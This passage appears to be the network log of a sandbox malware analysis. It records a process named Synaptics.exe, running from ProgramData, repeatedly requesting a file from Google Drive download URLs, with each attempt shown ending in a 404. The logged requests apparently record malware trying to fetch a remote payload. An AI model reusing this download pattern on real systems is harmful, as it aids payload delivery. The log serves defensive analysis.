                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-qeOH72AY20mZI-glBLxagQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:15 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:15 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 6a 37 58 4e 77 4d 49 67 47 35 36 73 45 75 74 55 63 36 34 4f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="ej7XNwMIgG56sEutUc64OQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:15 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        30192.168.2.749942142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:16 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg
                                                                                                                                                        2024-12-30 10:48:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:16 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-sW8kGezcKezZMqCMwSXJuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        31192.168.2.749941142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:16 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:16 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ykIv4jqf9tVQcTQNl4-hOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        32192.168.2.749943142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:16 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:17 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6lG_KZ7i1BNFK9G2cJ81NtjHtiZus-IfaxOlZ36RWO-nOBeYU0xBOCQBXBtziiV6TuRAfywbw
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:16 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-63ZV49Spiudd8hbtoKyFGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:17 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:17 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 62 77 48 4e 53 63 58 57 57 55 58 33 67 31 44 39 34 64 6e 4c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="mbwHNScXWWUX3g1D94dnLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:17 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        33192.168.2.749944142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:16 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:16 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6k0L1BJ6XhY57Ipo91YvSKzYOvBqIJ_Hm8cXvJCz_gJAqJxZFD4PNcMMxBSw8k4rTF0JdU8ZM
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:16 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ltYDdk36jpTYIsuLe-uYgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:16 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:16 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 50 57 37 66 53 44 58 51 79 4a 6e 6a 45 33 55 2d 50 34 30 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="YPW7fSDXQyJnjE3U-P40GA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:16 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        34192.168.2.749953142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:17 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg
                                                                                                                                                        2024-12-30 10:48:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:17 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-m_mOhRNzqYAUKJpwRjspnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        35192.168.2.749954142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:17 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg
                                                                                                                                                        2024-12-30 10:48:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:17 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9GPguaFzYZgRN1of-AODnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        36192.168.2.749957142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:17 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:17 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5LkxIxUAHF9S4ZJ6aJNwB27a63khB_y7-7HmIZPJ2Te1QJ-_-z-fjHAFRXLeZjlkbDfXQfqI8
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:17 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-oLGlhjwAtG6D2pZIkBBHcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
